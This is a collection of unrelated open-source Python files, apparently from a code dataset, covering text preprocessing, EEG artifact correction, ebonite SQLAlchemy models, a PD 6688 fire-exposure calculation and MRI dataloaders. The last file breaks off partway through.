#stemmer = PorterStemmer()
stemmer = Stemmer.Stemmer("english")
def textpreprocess(txt, converthtml=True, sentencetokenize=True, removeblanklines=True, replacehyphenbyspace=True, wordtokenize=True, lowercase=True, removestopwords=True, stem=True, removenonalphanumericchars=True, stemlastword=False, stripallwhitespace=False):
"""
Note: For html2text, one could also use NCleaner (common.html2text.batch_nclean)
Note: One could improve the sentence tokenization, by using the
original HTML formatting in the tokenization.
Note: We use the Porter stemmer. (Optimization: Shouldn't rebuild
the PorterStemmer object each time this function is called.)
"""
if converthtml:
txt = html2text.html2text(txt)
if sentencetokenize:
txts = nltk.word_tokenize(txt)
#txts = tokenizer.tokenize(txt.split())
else:
txts = [txt]
txt = None
if removeblanklines:
newtxts = []
for t in txts:
if len(string.strip(t)) > 0:
newtxts.append(t)
txts = newtxts
if replacehyphenbyspace:
txts = [t.replace("-", " ") for t in txts]
if wordtokenize:
txtwords = [word_tokenize(t) for t in txts]
else:
txtwords = [string.split(t) for t in txts]
txts = None
if lowercase:
txtwords = [[string.lower(w) for w in t] for t in txtwords]
if removestopwords:
txtwords = _removestopwords(txtwords)
if stem:
txtwords = _stem(txtwords)
# TODO: Maybe remove Unicode accents? http://stackoverflow.com/questions/517923/what-is-the-best-way-to-remove-accents-in-a-python-unicode-string
if removenonalphanumericchars:
txtwords = _removenonalphanumericchars(txtwords)
txtwords = [[w for w in t if w != ""] for t in txtwords]
if stemlastword:
txtwords = _stemlastword(txtwords)
txts = [string.join(words) for words in txtwords]
if stripallwhitespace:
txts = _stripallwhitespace(txts)
return string.join(txts, sep=" ")
def _removestopwords(txtwords):
global stoplist
# stoplist = stopwords.words("english")
if stoplist is None:
stoplist = frozenset([string.strip(l) for l in open(STOPFILE).readlines()])
return [[w for w in t if w not in stoplist] for t in txtwords]
def _stem(txtwords):
# stemmer = PorterStemmer()
# return [[stemmer.stem(w) for w in t] for t in txtwords]
return [stemmer.stemWords(t) for t in txtwords]
def _removenonalphanumericchars(txtwords):
return [[string.join([c for c in w if _alphanumre.search(c) is not None], "") for w in t] for t in txtwords]
def _stemlastword(txtwords):
# return [t[:-1] + [stemmer.stem(t[-1])] for t in txtwords if len(t) > 0]
return [t[:-1] + [stemmer.stemWord(t[-1])] for t in txtwords if len(t) > 0]
def _stripallwhitespace(txts):
return [_wsre.sub("", txt) for txt in txts]
if __name__ == "__main__":
import sys
print textpreprocess('hello how are you sleeping ?')
print textpreprocess(sys.stdin.read())
| 3.1875 | 3 |
model/project.py | checheninao/python_training_mantis | 0 | 12799120 | class Project:
def __init__(self, name, status=None, description=None):
self.name = name
self.description = description
self.status = status
def __repr__(self):
return self.name
def __eq__(self, other):
return self.name == other.name
def key(self):
return self.name
| 2.875 | 3 |
util/process_dump.py | ArchiveTeam/twitchtv-index | 0 | 12799121 | <filename>util/process_dump.py
import argparse
import collections
import json
import shutil
import os
def main():
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('input_dump', type=argparse.FileType('r'))
arg_parser.add_argument('output_dir')
args = arg_parser.parse_args()
if not os.path.isdir(args.output_dir):
raise Exception('output_dir is not a directory')
user_pool = collections.defaultdict(
lambda: collections.defaultdict(
lambda: collections.defaultdict(list))
)
flv_pool = collections.defaultdict(lambda: collections.defaultdict(dict))
for line in args.input_dump:
doc = json.loads(line)
if not doc.get('item_added_to_tracker'):
continue
user = doc['user'].lower()
video_id = doc['video_id']
user_pool[user[0:1]][user[0:2]][user].append(video_id)
user_pool[user[0:1]][user[0:2]][user] = list(sorted(user_pool[user[0:1]][user[0:2]][user]))
flv_urls = []
flv_doc = doc['flv']
flv_keys = tuple(sorted(int(key) for key in flv_doc.keys()))
for key in flv_keys:
url = flv_doc[str(key)]
flv_urls.append(url)
flv_pool[video_id[0:2]][video_id[0:3]][video_id] = flv_urls
for key, subpool in user_pool.items():
for subkey, subsubpool in subpool.items():
path = 'channel/{0}/data-{1}.json'.format(key, subkey)
path = os.path.join(args.output_dir, path)
dir_path = os.path.dirname(path)
if not os.path.exists(dir_path):
os.makedirs(dir_path)
with open(path, 'w') as out_file:
json.dump(subsubpool, out_file, indent=2)
for key, subpool in flv_pool.items():
for subkey, subsubpool in subpool.items():
path = 'video/{0}/data-{1}.json'.format(key, subkey)
path = os.path.join(args.output_dir, path)
dir_path = os.path.dirname(path)
if not os.path.exists(dir_path):
os.makedirs(dir_path)
with open(path, 'w') as out_file:
json.dump(subsubpool, out_file, indent=2)
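    # Resulting on-disk layout (illustrative summary, not from the original source):
    #   channel/<first letter>/data-<first two letters>.json  -> {username: [video_id, ...], ...}
    #   video/<first two chars>/data-<first three chars>.json -> {video_id: [flv_url, ...], ...}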
if __name__ == '__main__':
main()
| 2.359375 | 2 |
utils_prep/preproc_manu/ASR/1_AsrCorrection.py | GanshengT/INSERM_EEG_Enrico_Proc | 1 | 12799122 | # -*- coding: utf-8 -*-
"""
Created on Fri Jun 21 15:39:43 2019
@author: Manu
"""
import mne
from mne import io
import sys
sys.path.append('C:/_MANU/_U821/Python_Dev/')
import scipy
from util import tools,asr,raw_asrcalibration
import numpy as np
import matplotlib.pyplot as plt
from mne.viz import plot_evoked_topo
fname = 'C:/_MANU/_U821/_wip/ContextOdd/raw/ANDNI_0001.vhdr'
raw = io.read_raw_brainvision(fname, preload = False)
picks_eeg = mne.pick_types(raw.info, meg=False, eeg=True, eog=False,stim=False, exclude='bads')
ListChannels = np.array(raw.info['ch_names'])
montage = mne.channels.read_montage(kind='standard_1020',ch_names=ListChannels[picks_eeg])
raw = io.read_raw_brainvision(fname, montage=montage, preload = True)
picks_eeg = mne.pick_types(raw.info, meg=False, eeg=True, eog=False,stim=False, exclude='bads')
raw =raw.pick_types( meg=False, eeg=True, eog=False,stim=True, exclude='bads')
# ASR Calibration
raworig_Data= raw._data
l_freq = 2
h_freq = 20
Wn = [l_freq/(raw.info['sfreq']/2.), h_freq/(raw.info['sfreq']/2.) ]
b, a = scipy.signal.iirfilter(N=2, Wn=Wn, btype = 'bandpass', analog = False, ftype = 'butter', output = 'ba')
raw._data[picks_eeg,:]=scipy.signal.lfilter(b, a, raworig_Data[picks_eeg,:], axis = 1, zi = None)
rawCalibAsr=raw.copy()
tmin = 30
tmax = 60 #s
rawCalibAsr = rawCalibAsr.crop(tmin=tmin,tmax=tmax)
ChanName4VEOG = ['Fp1','Fp2'] # 2 VEOG
cutoff = 5 # Makoto preprocessing says best between 10 and 20 https://sccn.ucsd.edu/wiki/Makoto%27s_preprocessing_pipeline#Alternatively.2C_cleaning_continuous_data_using_ASR_.2803.2F26.2F2019_updated.29
Yule_Walker_filtering = True
state = raw_asrcalibration.raw_asrcalibration(rawCalibAsr,ChanName4VEOG, cutoff,Yule_Walker_filtering)
# ASR process on epoch
event_id = {'Std': 1, 'Dev': 2}
events_orig,_ = mne.events_from_annotations(raw)
ixdev = np.array(np.where(events_orig[:,2]==2))
ixstd= ixdev-1
events = events_orig[np.sort(np.array(np.hstack((ixstd , ixdev)))),:]
events = np.squeeze(events, axis=0)
tmin, tmax = -0.2, 0.5
raw4detect = raw.copy()
raw4detect._data,iirstate = asr.YW_filter(raw._data,raw.info['sfreq'],None) ## HERE
epochs4Detect = mne.Epochs(raw4detect, events=events, event_id=event_id, tmin=tmin,tmax=tmax, proj=True,baseline=None, reject=None, picks=picks_eeg)
epochs_filt = mne.Epochs(raw, events=events, event_id=event_id, tmin=tmin,tmax=tmax, proj=None,baseline=None, reject=None, picks=picks_eeg)
Data4detect = epochs4Detect.get_data()
Data2Correct = epochs_filt.get_data()
DataClean = np.zeros((Data2Correct.shape))
for i_epoch in range(Data4detect.shape[0]):
EpochYR = Data4detect[i_epoch,:,:]
Epoch2Corr = Data2Correct[i_epoch,:,:]
DataClean[i_epoch,:,:] = asr.asr_process_on_epoch(EpochYR,Epoch2Corr,state)
epochs_clean = mne.EpochsArray(DataClean,info=epochs_filt.info,events=events,event_id=event_id)
srate = raw.info['sfreq']
evoked_std = epochs_filt['Std'].average(picks=picks_eeg)
evoked_dev = epochs_filt['Dev'].average(picks=picks_eeg)
evoked_clean_std = epochs_clean['Std'].average(picks=picks_eeg)
evoked_clean_dev = epochs_clean['Dev'].average(picks=picks_eeg)
evoked_clean_std.first=-200
evoked_clean_std.last= tmax*srate
evoked_clean_dev.first=-200
evoked_clean_dev.last= tmax*srate
evoked_clean_std.times= np.around(np.linspace(-0.2, tmax, num=DataClean.shape[2]),decimals=3)
evoked_clean_dev.times= np.around(np.linspace(-0.2, tmax, num=DataClean.shape[2]),decimals=3)
evokeds = [evoked_std, evoked_dev, evoked_clean_std, evoked_clean_dev]
colors = 'blue', 'red','steelblue','magenta'
plot_evoked_topo(evokeds, color=colors, title='Std Dev', background_color='w')
plt.show()
evoked_clean_MMN=evoked_clean_std.copy()
evoked_clean_MMN.data = (evoked_clean_dev.data - evoked_clean_std.data)
evoked_MMN =evoked_clean_MMN.copy()
evoked_MMN.data = (evoked_dev.data-evoked_std.data)
evokeds_MMN= [evoked_clean_MMN,evoked_MMN]
colors = 'red', 'black'
plot_evoked_topo(evokeds_MMN, color=colors, title='MMN', background_color='w')
plt.show()
kwargs = dict(times=np.arange(-0.1, 0.40, 0.025), vmin=-1.5, vmax=1.5, layout='auto',
head_pos=dict(center=(0., 0.), scale=(1., 1.)))
evoked_MMN.plot_topomap(**kwargs)
evoked_clean_MMN.plot_topomap(**kwargs)
| 1.710938 | 2 |
mediapp_be/config/__init__.py | MedPy-C/backend | 0 | 12799123 | <reponame>MedPy-C/backend
import os
from .development import Development
# from .production import Production
# from .test import Test
def get_configs(enviroment=None):
from mediapp_be.config.test import Test
configs = {
'dev': Development,
# 'prd': Production,
'test': Test
}
if not enviroment:
enviroment = os.environ.get('MEDIAPP_BE_API_ENV', 'dev')
return configs[enviroment]()
env = get_configs()
| 2.109375 | 2 |
src/ebonite/ext/sqlalchemy/models.py | zyfra/ebonite | 270 | 12799124 | from abc import abstractmethod
from typing import Any, Dict, Iterable, List, Optional, Type, TypeVar
from pyjackson import dumps, loads
from sqlalchemy import Column, DateTime, ForeignKey, Integer, String, Text, UniqueConstraint
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from ebonite.core.objects import DatasetType
from ebonite.core.objects.artifacts import ArtifactCollection
from ebonite.core.objects.core import (Buildable, EvaluationResults, EvaluationSet, Image, Model, Pipeline,
PipelineStep, Project, RuntimeEnvironment, RuntimeInstance, Task)
from ebonite.core.objects.dataset_source import DatasetSource
from ebonite.core.objects.metric import Metric
from ebonite.core.objects.requirements import Requirements
SQL_OBJECT_FIELD = '_sqlalchemy_object'
def json_column():
return Column(Text)
def safe_loads(payload, as_class):
return loads(payload, Optional[as_class])
def sqlobject(obj):
return getattr(obj, SQL_OBJECT_FIELD, None)
def update_attrs(obj, **attrs):
for name, value in attrs.items():
setattr(obj, name, value)
T = TypeVar('T')
S = TypeVar('S', bound='Attaching')
class Attaching:
id = ...
name = ...
def attach(self, obj):
setattr(obj, SQL_OBJECT_FIELD, self)
return obj
@classmethod
def from_obj(cls: Type[S], obj: T, new=False) -> S:
kwargs = cls.get_kwargs(obj)
existing = sqlobject(obj)
if not new and existing is not None:
update_attrs(existing, **kwargs)
return existing
return cls(**kwargs)
@classmethod
@abstractmethod
def get_kwargs(cls, obj: T) -> dict:
pass # pragma: no cover
@abstractmethod
def to_obj(self) -> T:
pass # pragma: no cover
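# Usage pattern (sketch, not part of the original module): each S* row class mirrors a
# core ebonite object; from_obj() creates or updates the SQLAlchemy row from the core
# object, and to_obj() rebuilds the core object with the row attached, e.g.:
#   sproject = SProject.from_obj(project)   # core Project -> SProject row
#   project_again = sproject.to_obj()       # SProject row -> core Project (row attached)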
Base = declarative_base()
class SProject(Base, Attaching):
__tablename__ = 'projects'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=True, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
tasks: Iterable['STask'] = relationship("STask", back_populates="project")
def to_obj(self) -> Project:
p = Project(self.name, id=self.id, author=self.author, creation_date=self.creation_date)
for task in self.tasks:
p._tasks.add(task.to_obj())
return self.attach(p)
@classmethod
def get_kwargs(cls, project: Project) -> dict:
return dict(id=project.id,
name=project.name,
author=project.author,
creation_date=project.creation_date,
tasks=[STask.from_obj(t) for t in project.tasks.values()])
class STask(Base, Attaching):
__tablename__ = 'tasks'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
project_id = Column(Integer, ForeignKey('projects.id'), nullable=False)
project = relationship("SProject", back_populates="tasks")
models: Iterable['SModel'] = relationship("SModel", back_populates="task")
pipelines: Iterable['SPipeline'] = relationship("SPipeline", back_populates='task')
images: Iterable['SImage'] = relationship("SImage", back_populates='task')
datasets = Column(Text)
metrics = Column(Text)
evaluation_sets = Column(Text)
__table_args__ = (UniqueConstraint('name', 'project_id', name='tasks_name_and_ref'),)
def to_obj(self) -> Task:
task = Task(id=self.id,
name=self.name,
author=self.author,
creation_date=self.creation_date,
project_id=self.project_id,
datasets=safe_loads(self.datasets, Dict[str, DatasetSource]),
metrics=safe_loads(self.metrics, Dict[str, Metric]),
evaluation_sets=safe_loads(self.evaluation_sets, Dict[str, EvaluationSet]))
for model in self.models:
task._models.add(model.to_obj())
for pipeline in self.pipelines:
task._pipelines.add(pipeline.to_obj())
for image in self.images:
task._images.add(image.to_obj())
return self.attach(task)
@classmethod
def get_kwargs(cls, task: Task) -> dict:
return dict(id=task.id,
name=task.name,
author=task.author,
creation_date=task.creation_date,
project_id=task.project_id,
models=[SModel.from_obj(m) for m in task.models.values()],
images=[SImage.from_obj(i) for i in task.images.values()],
pipelines=[SPipeline.from_obj(p) for p in task.pipelines.values()],
datasets=dumps(task.datasets),
metrics=dumps(task.metrics),
evaluation_sets=dumps(task.evaluation_sets))
class SModel(Base, Attaching):
__tablename__ = 'models'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
wrapper = Column(Text)
artifact = Column(Text)
requirements = Column(Text)
description = Column(Text)
params = Column(Text)
task_id = Column(Integer, ForeignKey('tasks.id'), nullable=False)
task = relationship("STask", back_populates="models")
evaluations = Column(Text)
__table_args__ = (UniqueConstraint('name', 'task_id', name='models_name_and_ref'),)
def to_obj(self) -> Model:
model = Model(name=self.name,
wrapper_meta=safe_loads(self.wrapper, dict),
author=self.author,
creation_date=self.creation_date,
artifact=safe_loads(self.artifact, ArtifactCollection),
requirements=safe_loads(self.requirements, Requirements),
description=self.description,
params=safe_loads(self.params, Dict[str, Any]),
id=self.id,
task_id=self.task_id,
evaluations=safe_loads(self.evaluations, Dict[str, EvaluationResults]))
return self.attach(model)
@classmethod
def get_kwargs(cls, model: Model) -> dict:
return dict(id=model.id,
name=model.name,
author=model.author,
creation_date=model.creation_date,
wrapper=dumps(model.wrapper_meta),
artifact=dumps(model.artifact),
requirements=dumps(model.requirements),
description=model.description,
params=dumps(model.params),
task_id=model.task_id,
evaluations=dumps(model.evaluations))
class SPipeline(Base, Attaching):
__tablename__ = 'pipelines'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
steps = Column(Text)
input_data = Column(Text)
output_data = Column(Text)
task_id = Column(Integer, ForeignKey('tasks.id'), nullable=False)
task = relationship("STask", back_populates="pipelines")
evaluations = Column(Text)
__table_args__ = (UniqueConstraint('name', 'task_id', name='pipelines_name_and_ref'),)
def to_obj(self) -> Pipeline:
pipeline = Pipeline(name=self.name,
steps=safe_loads(self.steps, List[PipelineStep]),
input_data=safe_loads(self.input_data, DatasetType),
output_data=safe_loads(self.output_data, DatasetType),
author=self.author,
creation_date=self.creation_date,
id=self.id,
task_id=self.task_id,
evaluations=safe_loads(self.evaluations, EvaluationResults))
return self.attach(pipeline)
@classmethod
def get_kwargs(cls, pipeline: Pipeline) -> dict:
return dict(id=pipeline.id,
name=pipeline.name,
author=pipeline.author,
creation_date=pipeline.creation_date,
steps=dumps(pipeline.steps),
input_data=dumps(pipeline.input_data),
output_data=dumps(pipeline.output_data),
task_id=pipeline.task_id,
evaluations=dumps(pipeline.evaluations))
class SImage(Base, Attaching):
__tablename__ = 'images'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
task_id = Column(Integer, ForeignKey('tasks.id'), nullable=False)
task = relationship("STask", back_populates="images")
environment_id = Column(Integer, ForeignKey('environments.id'), nullable=False)
params = Column(Text)
source = Column(Text)
__table_args__ = (UniqueConstraint('name', 'task_id', name='image_name_and_ref'),)
def to_obj(self) -> Image:
image = Image(name=self.name,
author=self.author,
creation_date=self.creation_date,
id=self.id,
task_id=self.task_id,
params=safe_loads(self.params, Image.Params),
source=safe_loads(self.source, Buildable),
environment_id=self.environment_id)
return self.attach(image)
@classmethod
def get_kwargs(cls, image: Image) -> dict:
return dict(id=image.id,
name=image.name,
author=image.author,
creation_date=image.creation_date,
task_id=image.task_id,
params=dumps(image.params),
source=dumps(image.source),
environment_id=image.environment_id)
class SRuntimeEnvironment(Base, Attaching):
__tablename__ = 'environments'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=True, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
params = Column(Text)
def to_obj(self) -> RuntimeEnvironment:
environment = RuntimeEnvironment(
name=self.name,
author=self.author,
creation_date=self.creation_date,
id=self.id,
params=safe_loads(self.params, RuntimeEnvironment.Params))
return self.attach(environment)
@classmethod
def get_kwargs(cls, environment: RuntimeEnvironment) -> dict:
return dict(id=environment.id,
name=environment.name,
author=environment.author,
creation_date=environment.creation_date,
params=dumps(environment.params))
class SRuntimeInstance(Base, Attaching):
__tablename__ = 'instances'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
image_id = Column(Integer, ForeignKey('images.id'), nullable=False)
environment_id = Column(Integer, ForeignKey('environments.id'), nullable=False)
params = Column(Text)
__table_args__ = (UniqueConstraint('name', 'image_id', 'environment_id', name='instance_name_and_ref'),)
def to_obj(self) -> RuntimeInstance:
instance = RuntimeInstance(
name=self.name,
author=self.author,
creation_date=self.creation_date,
id=self.id,
image_id=self.image_id,
environment_id=self.environment_id,
params=safe_loads(self.params, RuntimeInstance.Params))
return self.attach(instance)
@classmethod
def get_kwargs(cls, instance: RuntimeInstance) -> dict:
return dict(id=instance.id,
name=instance.name,
author=instance.author,
creation_date=instance.creation_date,
image_id=instance.image_id,
environment_id=instance.environment_id,
params=dumps(instance.params))
| 2.140625 | 2 |
sfeprapy/func/pd_6688_1_2_2007.py | fsepy/sfeprapy | 4 | 12799125 | # -*- coding: utf-8 -*-
import numpy as np
def annex_b_equivalent_time_of_fire_exposure(
q_fk, delta_1, m, k_b, A_f, H, A_vh, A_vv, delta_h
):
"""Calculates time equivalence of standard fire exposure in accordance with PD 6688-1-2 Annex B
IAN FU 12 APRIL 2019
:param q_fk: [MJ/m2] Fire load density
:param delta_1: Active suppression factor
:param m: Combustion factor
:param k_b: Conversion factor
:param A_f: [m2] Floor area of the compartment
:param H: [m] Height of the compartment
:param A_vh: [m2] Horizontal area
:param A_vv: [m2] Vertical area
:param delta_h: Height factor
:return: Equivalent time exposure
SUPPLEMENT INFO:
Table A.4 - Design fire growth rates (from PD 7974-1:2003, Table 3)
| BUILDING | USE |
|------------------------------------------------------------------|------------|
| Picture gallery | Slow |
| Passenger stations and termini for air_ rail_ road or sea travel | Slow |
| Classroom (school) | Medium |
| Dwelling | Medium |
| Office | Medium |
| Hotel reception | Medium |
| Hotel bedroom | Medium |
| Hospital room | Medium |
| Library | Fast |
| Theatre (cinema) | Fast |
| Shop | Fast |
| Industrial storage or plant room | Ultra-fast |
Table A.5 - Heat release rate per unit area of fire for different occupancies (from PD 7974-1:2003)
| OCCUPANCY | HEAT RELEASE RATE PER UNIT AREA | $Q''$ [kW/m2] | |
|-------------|---------------------------------|---------------|---|
| Shops | 550 | | |
| Offices | 290 | | |
| Hotel rooms | 249 | | |
| Industrial | 86-620 | | |
EXAMPLE:
>>> kwargs = dict(q_fk=900, delta_1=0.61, m=1, k_b=0.09, H=4, A_f=856.5, A_vh=0, A_vv=235.2, delta_h=2)
>>> print(annex_b_equivalent_time_of_fire_exposure(**kwargs))
>>> 74.27814882871894
"""
# B.1
# Design fire load [MJ/m2]
q_fd = q_fk * delta_1 * m
# B.2
# Vertical opening factor
alpha_v = min([max([A_vv / A_f, 0.025]), 0.25])
# horizontal opening factor
alpha_h = A_vh / A_f
# just a factor
b_v = (
12.5 * (1 + 10 * alpha_v - alpha_v ** 2)
if (12.5 * (1 + 10 * alpha_v - alpha_v ** 2)) >= 10
else np.nan
)
# total ventilation factor
w_f = ((6 / H) ** 0.3) * ((0.62 + 90 * (0.4 - alpha_v) ** 4) / (1 + b_v * alpha_h))
w_f = w_f if A_f >= 100 else np.nan
return q_fd * k_b * w_f * delta_h
if __name__ == "__main__":
input_params = dict(
q_fk=900,
delta_1=0.61,
m=1,
k_b=0.09,
H=4,
A_f=856.5,
A_vh=0,
A_vv=235.2,
delta_h=2,
)
input_params = dict(
q_fk=900,
delta_1=1.0,
m=1,
k_b=0.09,
H=4,
A_f=877,
A_vh=0,
A_vv=98.35,
delta_h=2,
)
res = annex_b_equivalent_time_of_fire_exposure(**input_params)
print(res / 60)
| 2.484375 | 2 |
dataloader.py | colorfulbrain/brain2020 | 91 | 12799126 | <reponame>colorfulbrain/brain2020
from __future__ import print_function, division
import os
import torch
import numpy as np
from torch.utils.data import Dataset, DataLoader
from utils import PatchGenerator, padding, read_csv, read_csv_complete, read_csv_complete_apoe, get_AD_risk
import random
import pandas as pd
import csv
"""
dataloaders are defined in this scripts:
1. FCN dataloader (data split into 60% train, 20% validation and 20% testing)
(a). Training stage: use random patches to train classification FCN model
(b). Validation stage: forward whole volume MRI to FCN to get Disease Probability Map (DPM). use MCC of DPM as criterion to save model parameters
(c). Testing stage: get all available DPMs for the development of MLP
2. MLP dataloader (use the exactly same split as FCN dataloader)
(a). Training stage: train MLP on DPMs from the training portion
(b). Validation stage: use MCC as criterion to save model parameters
(c). Testing stage: test the model on ADNI_test, NACC, FHS and AIBL datasets
3. CNN dataloader (baseline classification model to be compared with FCN+MLP framework)
(a). Training stage: use whole volume to train classification FCN model
(b). Validation stage: use MCC as criterion to save model parameters
(c). Testing stage: test the model on ADNI_test, NACC, FHS and AIBL datasets
"""
class Augment:
def __init__(self):
self.contrast_factor = 0.2
self.bright_factor = 0.4
self.sig_factor = 0.2
def change_contrast(self, image):
ratio = 1 + (random.random() - 0.5)*self.contrast_factor
return image.mean() + ratio*(image - image.mean())
def change_brightness(self, image):
val = (random.random() - 0.5)*self.bright_factor
return image + val
def add_noise(self, image):
sig = random.random() * self.sig_factor
return np.random.normal(0, sig, image.shape) + image
def apply(self, image):
image = self.change_contrast(image)
image = self.change_brightness(image)
image = self.add_noise(image)
return image
class CNN_Data(Dataset):
"""
    csv files ./lookupcsv/*.csv contain MRI filenames along with demographic and diagnosis information
"""
def __init__(self, Data_dir, exp_idx, stage, seed=1000):
random.seed(seed)
self.Data_dir = Data_dir
if stage in ['train', 'valid', 'test']:
self.Data_list, self.Label_list = read_csv('./lookupcsv/exp{}/{}.csv'.format(exp_idx, stage))
elif stage in ['ADNI', 'NACC', 'AIBL', 'FHS']:
self.Data_list, self.Label_list = read_csv('./lookupcsv/{}.csv'.format(stage))
def __len__(self):
return len(self.Data_list)
def __getitem__(self, idx):
label = self.Label_list[idx]
data = np.load(self.Data_dir + self.Data_list[idx] + '.npy').astype(np.float32)
data = np.expand_dims(data, axis=0)
return data, label
def get_sample_weights(self):
count, count0, count1 = float(len(self.Label_list)), float(self.Label_list.count(0)), float(self.Label_list.count(1))
weights = [count / count0 if i == 0 else count / count1 for i in self.Label_list]
return weights, count0 / count1
class FCN_Data(CNN_Data):
def __init__(self,
Data_dir,
exp_idx,
stage,
whole_volume=False,
seed=1000,
patch_size=47,
transform=Augment()):
"""
:param Data_dir: data path
:param exp_idx: experiment index maps to different data splits
:param stage: stage could be 'train', 'valid', 'test' and etc ...
:param whole_volume: if whole_volume == True, get whole MRI;
if whole_volume == False and stage == 'train', sample patches for training
:param seed: random seed
:param patch_size: patch size has to be 47, otherwise model needs to be changed accordingly
:param transform: transform is about data augmentation, if transform == None: no augmentation
for more details, see Augment class
"""
CNN_Data.__init__(self, Data_dir, exp_idx, stage, seed)
self.stage = stage
self.transform = transform
self.whole = whole_volume
self.patch_size = patch_size
self.patch_sampler = PatchGenerator(patch_size=self.patch_size)
def __getitem__(self, idx):
label = self.Label_list[idx]
if self.stage == 'train' and not self.whole:
data = np.load(self.Data_dir + self.Data_list[idx] + '.npy', mmap_mode='r').astype(np.float32)
patch = self.patch_sampler.random_sample(data)
if self.transform:
patch = self.transform.apply(patch).astype(np.float32)
patch = np.expand_dims(patch, axis=0)
return patch, label
else:
data = np.load(self.Data_dir + self.Data_list[idx] + '.npy').astype(np.float32)
data = np.expand_dims(padding(data, win_size=self.patch_size // 2), axis=0)
return data, label
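# Minimal usage sketch (the data directory here is an assumption; it must hold the
# preprocessed .npy volumes referenced by the ./lookupcsv files):
#   train_set = FCN_Data('/data/MRI/', exp_idx=1, stage='train')
#   patch, label = train_set[0]      # random patch of shape (1, 47, 47, 47)
#   valid_set = FCN_Data('/data/MRI/', exp_idx=1, stage='valid', whole_volume=True)
#   volume, label = valid_set[0]     # whole padded volume, used to generate DPMs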
class MLP_Data(Dataset):
def __init__(self, Data_dir, exp_idx, stage, roi_threshold, roi_count, choice, seed=1000):
random.seed(seed)
self.exp_idx = exp_idx
self.Data_dir = Data_dir
self.roi_threshold = roi_threshold
self.roi_count = roi_count
if choice == 'count':
self.select_roi_count()
else:
self.select_roi_thres()
if stage in ['train', 'valid', 'test']:
self.path = './lookupcsv/exp{}/{}.csv'.format(exp_idx, stage)
else:
self.path = './lookupcsv/{}.csv'.format(stage)
self.Data_list, self.Label_list, self.demor_list = read_csv_complete(self.path)
self.risk_list = [get_AD_risk(np.load(Data_dir+filename+'.npy'))[self.roi] for filename in self.Data_list]
self.in_size = self.risk_list[0].shape[0]
def select_roi_thres(self):
self.roi = np.load('./DPMs/fcn_exp{}/train_MCC.npy'.format(self.exp_idx))
self.roi = self.roi > self.roi_threshold
for i in range(self.roi.shape[0]):
for j in range(self.roi.shape[1]):
for k in range(self.roi.shape[2]):
if i%3!=0 or j%2!=0 or k%3!=0:
self.roi[i,j,k] = False
def select_roi_count(self):
self.roi = np.load('./DPMs/fcn_exp{}/train_MCC.npy'.format(self.exp_idx))
tmp = []
for i in range(self.roi.shape[0]):
for j in range(self.roi.shape[1]):
for k in range(self.roi.shape[2]):
if i%3!=0 or j%2!=0 or k%3!=0: continue
tmp.append((self.roi[i,j,k], i, j, k))
tmp.sort()
tmp = tmp[-self.roi_count:]
self.roi = self.roi != self.roi
for _, i, j, k in tmp:
self.roi[i,j,k] = True
def __len__(self):
return len(self.Data_list)
def __getitem__(self, idx):
label = self.Label_list[idx]
risk = self.risk_list[idx]
demor = self.demor_list[idx]
return risk, label, np.asarray(demor).astype(np.float32)
def get_sample_weights(self):
count, count0, count1 = float(len(self.Label_list)), float(self.Label_list.count(0)), float(self.Label_list.count(1))
weights = [count / count0 if i == 0 else count / count1 for i in self.Label_list]
return weights, count0 / count1
class MLP_Data_apoe(MLP_Data):
def __init__(self, Data_dir, exp_idx, stage, roi_threshold, roi_count, choice, seed=1000):
super().__init__(Data_dir, exp_idx, stage, roi_threshold, roi_count, choice, seed)
self.Data_list, self.Label_list, self.demor_list = read_csv_complete_apoe(self.path)
class CNN_MLP_Data(Dataset):
def __init__(self, Data_dir, exp_idx, stage, seed=1000):
random.seed(seed)
self.exp_idx = exp_idx
self.Data_dir = Data_dir
if stage in ['train', 'valid', 'test']:
path = './lookupcsv/exp{}/{}.csv'.format(exp_idx, stage)
else:
path = './lookupcsv/{}.csv'.format(stage)
self.Data_list, self.Label_list, self.demor_list = read_csv_complete(path)
self.risk_list = [np.load(Data_dir + filename + '.npy') for filename in self.Data_list]
self.risk_list = [self.rescale(a) for a in self.risk_list]
self.in_size = self.risk_list[0].shape[0]
def __len__(self):
return len(self.Data_list)
def __getitem__(self, idx):
label = self.Label_list[idx]
risk = self.risk_list[idx]
demor = self.demor_list[idx]
return risk, label, np.asarray(demor).astype(np.float32)
def rescale(self, x):
return (x + 8) / 20.0
def get_sample_weights(self):
count, count0, count1 = float(len(self.Label_list)), float(self.Label_list.count(0)), float(
self.Label_list.count(1))
weights = [count / count0 if i == 0 else count / count1 for i in self.Label_list]
return weights, count0 / count1
if __name__ == "__main__":
data = CNN_MLP_Data(Data_dir='./DPMs/cnn_exp1/', exp_idx=1, stage='train')
dataloader = DataLoader(data, batch_size=10, shuffle=False)
for risk, label, demor in dataloader:
print(risk.shape, label, demor) | 2.90625 | 3 |
analysis.py | bijonguha/Image-Analysis | 0 | 12799127 | <gh_stars>0
import cv2
import numpy as np
from skimage.exposure import is_low_contrast
import matplotlib.pyplot as plt
def check_contrast(path, method='rms'):
'''
Check contrast of given images using
RMS or Michelson method
path : str
path of given image
method : str
method 'rms' or 'mich'
Returns
None
'''
img = cv2.imread(path)
plt.figure()
if method == 'rms':
